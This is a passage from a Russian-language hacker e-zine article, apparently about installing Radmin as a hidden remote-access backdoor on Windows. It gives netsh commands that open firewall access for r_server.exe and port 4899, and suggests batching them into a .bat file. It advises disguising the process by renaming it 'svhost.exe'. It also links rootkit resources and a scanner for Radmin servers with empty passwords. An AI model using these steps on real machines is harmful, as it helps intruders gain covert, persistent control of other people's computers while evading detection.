          <td class="style7">&#1044;&#1086;&#1073;&#1072;&#1074;&#1083;&#1077;&#1085;&#1080;&#1077; &#1088;&#1072;&#1079;&#1088;&#1077;&#1096;&#1077;&#1085;&#1085;&#1086;&#1081; &#1087;&#1088;&#1086;&#1075;&#1088;&#1072;&#1084;&#1084;&#1099; &#1074; &#1073;&#1088;&#1072;&#1085;&#1076;&#1084;&#1072;&#1091;&#1101;&#1088; Windows. &#1044;&#1086;&#1073;&#1072;&#1074;&#1083;&#1077;&#1085;&#1080;&#1077; &#1082;&#1086;&#1085;&#1092;&#1080;&#1075;&#1091;&#1088;&#1072;&#1094;&#1080;&#1080; &#1087;&#1086;&#1088;&#1090;&#1072; &#1074;<br>
&#1073;&#1088;&#1072;&#1085;&#1076;&#1084;&#1072;&#1091;&#1101;&#1088; Windows</td>
        </tr>
		        <tr>
          <td class="style7"><p>&#1059;&#1076;&#1072;&#1083;&#1077;&#1085;&#1080;&#1077;</p>
          </td>
          <td class="style7">netsh firewall delete allowedprogram<br>netsh firewall delete portopening</td>
          <td class="style7">&#1059;&#1076;&#1072;&#1083;&#1077;&#1085;&#1080;&#1077; &#1088;&#1072;&#1079;&#1088;&#1077;&#1096;&#1077;&#1085;&#1085;&#1086;&#1081; &#1082;&#1086;&#1085;&#1092;&#1080;&#1075;&#1091;&#1088;&#1072;&#1094;&#1080;&#1080;<br>
&#1087;&#1088;&#1086;&#1075;&#1088;&#1072;&#1084;&#1084;&#1099; &#1080;&#1079; &#1073;&#1088;&#1072;&#1085;&#1076;&#1084;&#1072;&#1091;&#1101;&#1088;&#1072; Windows <br>&#1059;&#1076;&#1072;&#1083;&#1077;&#1085;&#1080;&#1077; &#1082;&#1086;&#1085;&#1092;&#1080;&#1075;&#1091;&#1088;&#1072;&#1094;&#1080;&#1080; &#1087;&#1086;&#1088;&#1090;&#1072; &#1080;&#1079;<br>
&#1073;&#1088;&#1072;&#1085;&#1076;&#1084;&#1072;&#1091;&#1101;&#1088;&#1072; Windows</td>
        </tr>
      </table>      <p class="style7">&#1076;&#1086;&#1073;&#1072;&#1074;&#1080;&#1090;&#1100; &#1087;&#1088;&#1072;&#1074;&#1080;&#1083;&#1086; &#1084;&#1086;&#1078;&#1085;&#1086; &#1086;&#1076;&#1085;&#1086;&#1081; &#1082;&#1086;&#1084;&#1084;&#1072;&#1085;&#1076;&#1086;&#1081;:</p>
      <p class="style7">CMD&gt;netsh firewall add allowedprogram C:\Progra~1\Radmin\r_server.exe systerm enable<br>
      &#1083;&#1080;&#1073;&#1086;<br>
        CMD&gt;netsh firewall add portopening TCP 4899 systerm<br>
      &#1075;&#1076;&#1077; systerm - &#1087;&#1088;&#1086;&#1089;&#1090;&#1086; &#1085;&#1072;&#1079;&#1074;&#1072;&#1085;&#1077; &#1087;&#1088;&#1072;&#1074;&#1080;&#1083;&#1072;.</p>
      <p class="style7">&#1045;&#1089;&#1083;&#1080; &#1078;&#1077; &#1085;&#1072; &#1084;&#1072;&#1096;&#1080;&#1085;&#1077; &#1091;&#1089;&#1090;&#1072;&#1085;&#1086;&#1074;&#1083;&#1077;&#1085; &#1085;&#1077; SP2, &#1090;&#1086; &#1087;&#1088;&#1080;&#1076;&#1105;&#1090;&#1089;&#1103; &#1087;&#1086;&#1088;&#1072;&#1073;&#1086;&#1090;&#1072;&#1090;&#1100; &#1076;&#1086;&#1073;&#1072;&#1074;&#1083;&#1103;&#1103; &#1085;&#1091;&#1078;&#1085;&#1099;&#1077; &#1082;&#1083;&#1102;&#1095;&#1080; &#1082; &#1088;&#1077;&#1077;&#1089;&#1090;&#1088;&#1091; 
      &#1091;&#1078;&#1077; &#1079;&#1085;&#1072;&#1082;&#1086;&#1084;&#1086;&#1081; &#1082;&#1086;&#1084;&#1084;&#1072;&#1085;&#1076;&#1086;&#1081; REG ADD.</p>
      <p class="style7">&#1050;&#1072;&#1082;&#1080;&#1084; &#1073;&#1099; &#1089;&#1087;&#1086;&#1089;&#1086;&#1073;&#1086;&#1084; &#1074;&#1099; &#1085;&#1077; &#1086;&#1090;&#1082;&#1083;&#1102;&#1095;&#1072;&#1083;&#1080; &#1073;&#1088;&#1072;&#1085;&#1076;&#1084;&#1072;&#1091;&#1101;&#1088; - &#1091;&#1076;&#1086;&#1073;&#1085;&#1077;&#1077; &#1076;&#1086;&#1087;&#1080;&#1089;&#1072;&#1090;&#1100; &#1074;&#1089;&#1077; &#1085;&#1077;&#1086;&#1073;&#1093;&#1086;&#1076;&#1080;&#1084;&#1099;&#1077; &#1082;&#1086;&#1084;&#1084;&#1072;&#1085;&#1076;&#1099; &#1074; 
      &#1091;&#1078;&#1077; &#1089;&#1086;&#1079;&#1076;&#1072;&#1085;&#1099;&#1081; &#1074; *.bat-&#1092;&#1072;&#1081;&#1083;...      </p>
      <p class="style7"><strong>0&#1093;06. &#1040;&#1091;&#1090;&#1090;&#1088;&#1086;</strong><br>
        ------------</p>
      <p class="style7"> &#1053;&#1077;&#1089;&#1084;&#1086;&#1090;&#1088;&#1103; &#1085;&#1072; &#1083;&#1105;&#1075;&#1082;&#1086;&#1089;&#1090;&#1100; &#1080; &#1101;&#1083;&#1077;&#1075;&#1072;&#1085;&#1090;&#1085;&#1086;&#1089;&#1090;&#1100; &#1101;&#1090;&#1086;&#1075;&#1086; &#1084;&#1077;&#1090;&#1086;&#1076;&#1072;, &#1091; &#1085;&#1077;&#1075;&#1086; &#1074;&#1089;&#1105; &#1078;&#1077; &#1077;&#1089;&#1090;&#1100; &#1085;&#1077;&#1089;&#1082;&#1086;&#1083;&#1100;&#1082;&#1086; &#1084;&#1080;&#1085;&#1091;&#1089;&#1086;&#1074;,
      &#1072; &#1080;&#1084;&#1077;&#1085;&#1085;&#1086;:</p>
      <p class="style7">- &#1086;&#1090;&#1082;&#1088;&#1099;&#1090;&#1099;&#1081; &#1087;&#1086;&#1088;&#1090; 4899. &#1057;&#1087;&#1088;&#1103;&#1090;&#1072;&#1090;&#1100; &#1089;&#1088;&#1077;&#1076;&#1089;&#1090;&#1074;&#1072;&#1084;&#1080; RAdmin'a &#1077;&#1075;&#1086; &#1085;&#1077;&#1083;&#1100;&#1079;&#1103;. &#1052;&#1086;&#1078;&#1085;&#1086; &#1090;&#1086;&#1083;&#1100;&#1082;&#1086; &#1087;&#1086;&#1084;&#1077;&#1085;&#1103;&#1090;&#1100;, 
&#1076;&#1086;&#1073;&#1072;&#1074;&#1080;&#1074; &#1087;&#1088;&#1080; &#1091;&#1089;&#1090;&#1072;&#1085;&#1086;&#1074;&#1082;&#1077; &#1082;&#1083;&#1102;&#1095; /port:[&#1087;&#1086;&#1088;&#1090;];<br>
  - &#1044;&#1086;&#1073;&#1072;&#1074;&#1083;&#1103;&#1077;&#1090;&#1089;&#1103; &#1085;&#1086;&#1074;&#1099;&#1081; &#1089;&#1077;&#1088;&#1074;&#1080;&#1089; (&#1089;&#1083;&#1091;&#1078;&#1073;&#1072;);<br>
  - &#1044;&#1086;&#1073;&#1072;&#1074;&#1083;&#1103;&#1102;&#1090;&#1089;&#1103; &#1079;&#1072;&#1087;&#1080;&#1089;&#1080; &#1074; &#1088;&#1077;&#1077;&#1089;&#1090;&#1088;;<br>
  - &#1047;&#1072;&#1084;&#1077;&#1090;&#1077;&#1085; &#1076;&#1083;&#1103; &#1072;&#1085;&#1090;&#1080;&#1074;&#1080;&#1088;&#1091;&#1089;&#1086;&#1074;;<br>
  - &#1057;&#1074;&#1077;&#1090;&#1080;&#1090;&#1100;&#1089;&#1103; &#1074; &#1087;&#1088;&#1086;&#1094;&#1077;&#1089;&#1089;&#1072;&#1093;. &#1059;&#1089;&#1090;&#1088;&#1072;&#1085;&#1103;&#1077;&#1090;&#1089;&#1103; &#1087;&#1091;&#1090;&#1105;&#1084; &#1087;&#1077;&#1088;&#1077;&#1080;&#1084;&#1077;&#1085;&#1086;&#1074;&#1099;&#1074;&#1072;&#1085;&#1080;&#1103; exe-&#1096;&#1085;&#1080;&#1082;&#1072; &#1074;&#1086; &#1095;&#1090;&#1086;-&#1085;&#1080;&#1073;&#1091;&#1090;&#1100; &#1085;&#1077;&#1087;&#1088;&#1080;&#1084;&#1077;&#1090;&#1085;&#1086;&#1077;,<br>
&#1085;&#1072;&#1087;&#1088;&#1080;&#1084;&#1077;&#1088; - svhost.exe =)<br>
  - &#1085;&#1077;&#1082;&#1086;&#1090;&#1086;&#1088;&#1099;&#1077; &#1082;&#1086;&#1084;&#1084;&#1072;&#1085;&#1076;&#1099; &#1076;&#1086;&#1089;&#1090;&#1091;&#1087;&#1085;&#1099; &#1090;&#1086;&#1083;&#1100;&#1082;&#1086; &#1074; WinXP SP2.      </p>
      <p class="style7"><strong>0&#1093;07. &#1057;&#1089;&#1099;&#1083;&#1082;&#1080;</strong><br>
        ------------</p>
      <p class="style7">- <a href="http://www.cyberlords.net" target="_blank">http://www.cyberlords.net</a> - &#1054;&#1088;&#1080;&#1075;&#1080;&#1085;&#1072;&#1083; &#1089;&#1090;&#1072;&#1090;&#1100;&#1080;<br>
        - <a href="http://www.cyberlords.net/" target="_blank">http://www.cyberlords.net/</a>... - &#1089;&#1082;&#1072;&#1085;&#1077;&#1088; &#1088;&#1072;&#1076;&#1084;&#1080;&#1085; &#1089;&#1077;&#1088;&#1074;&#1077;&#1088;&#1086;&#1074; &#1089; &#1087;&#1091;&#1089;&#1090;&#1099;&#1084; &#1087;&#1072;&#1088;&#1086;&#1083;&#1077;&#1084;<br>
        - <a href="http://www.blacklogic.net">http://www.blacklog...</a> - &#1040;&#1085;&#1072;&#1083;&#1080;&#1079; &#1089;&#1080;&#1089;&#1090;&#1077;&#1084;&#1099; &#1091;&#1076;&#1072;&#1083;&#1077;&#1085;&#1085;&#1086;&#1075;&#1086; &#1082;&#1086;&#1085;&#1090;&#1088;&#1086;&#1083;&#1103; NTRootKit, E-Zine FH0, 0x01<br>
        - <a href="http://www.famatech.com/support/faq.php" target="_blank">http://www.famatech.com/support/faq.php</a> - FAQ, &#1086;&#1092;&#1092;-&#1089;&#1072;&#1081;&#1090; RAdmin'a<br>
        - <a href="http://www.radmin.com" target="_blank">http://www.radmin.com</a> - &#1086;&#1092;&#1092;-&#1089;&#1072;&#1081;&#1090; RAdmin'a<br>
        - <a href="http://www.rootkit.com" target="_blank">http://www.rootkit.com</a><br>
        - <a href="http://www.ucl.ac.uk/cert/win_intrusion.pdf" target="_blank">http://www.ucl.ac.uk/cert/win_intrusion.pdf</a><br>
        - <a href="http://www1.umn.edu/oit/img/assets/5630/WindowsRootkits.pdf" target="_blank">http://www1.umn....ts.pdf</a> - &#1087;&#1088;&#1077;&#1079;&#1077;&#1085;&#1090;&#1072;&#1094;&#1080;&#1103; &#1089; &#1082;&#1086;&#1085;&#1092;&#1077;&#1088;&#1077;&#1085;&#1094;&#1080;&#1080; Defcon<br>
        - <a href="http://www.windowsecurity.com/articles/Hidden_Backdoors_Trojan_Horses_and_Rootkit_Tools_in_a_Windows_Environment.html" target="_blank">http://www.windowsecurity.c...nment.html</a></p>
    </td>
    <td width="150">&nbsp;</td>
  </tr>
  <tr>
    <td width="150">&nbsp;</td>
    <td width="600">&nbsp;</td>
    <td width="150">&nbsp;</td>
  </tr>
  <tr>
    <td width="150">&nbsp;</td>
    <td width="600">&nbsp;</td>
    <td width="150">&nbsp;</td>
  </tr>
  <tr>
    <td width="150" bgcolor="#CCCCCC"><div align="center"><a href="stat_02.htm" target="_self"><img src="img/strelka-back.gif" alt="&#1053;&#1072;&#1079;&#1072;&#1076;" width="50" height="30" border="0"></a></div></td>
    <td width="600"> <div align="center" class="style2">by eXp.l0ziv</div></td>
    <td width="150" bgcolor="#CCCCCC"><div align="center">
    <div align="center"><a href="stat_04.htm"><img src="img/strelka-fw.gif" alt="&#1042;&#1087;&#1077;&#1088;&#1077;&#1076;" width="50" height="30" border="0" align="middle"></a></div></td>
  </tr>
  <tr>
    <td width="150">&nbsp;</td>
    <td width="600">&nbsp;</td>
    <td width="150">&nbsp;</td>
  </tr>
</table>
</body>
</html>
